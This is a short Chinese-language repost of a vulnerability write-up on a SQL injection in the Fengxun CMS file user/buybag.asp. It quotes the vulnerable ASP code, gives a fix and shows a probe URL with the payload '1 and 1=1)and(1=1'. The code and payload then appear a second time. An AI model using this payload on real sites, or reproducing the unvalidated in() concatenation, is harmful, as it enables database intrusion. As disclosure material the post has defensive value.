风迅注入0day
user/buybag.asp
從第 40 行開始：
if request.Form("action")="makeorder" then
Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany
productIDS=DelHeadAndEndDot(request.Form("productIDS"))//這個函數功能是去掉頭尾的逗號?
Set OrderRs=Server.CreateObject(G_FS_RS)
Set BagRs=Server.CreateObject(G_FS_RS)
Set OrderDetail=Server.CreateObject(G_FS_RS)?
OrderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3
BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1
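注入發生在 in() 子句中!! request.Form("productIDS") 是使用者可控的輸入，按上面的註釋，DelHeadAndEndDot 只是去掉頭尾的逗號，沒有做任何數字校驗或轉義，之後就直接拼接進 SQL 語句的 in(...) 裡，因此提交的內容可以改變查詢語句的結構。修補方式：以逗號拆分 productIDS，逐項用 IsNumeric 檢查並轉成整數後再拼入 in()，遇到非數字項則拒絕整個請求；或者改用參數化查詢。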
user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1
從第 40 行開始：
if request.Form("action")="makeorder" then
Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany
productIDS=DelHeadAndEndDot(request.Form("productIDS"))//這個函數功能是去掉頭尾的逗號?
Set OrderRs=Server.CreateObject(G_FS_RS)
Set BagRs=Server.CreateObject(G_FS_RS)
Set OrderDetail=Server.CreateObject(G_FS_RS)?
OrderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3
BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1
注入發生在 in() 子句中!!
user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1
轉載于:https://www.cnblogs.com/allyesno/archive/2007/08/22/865542.html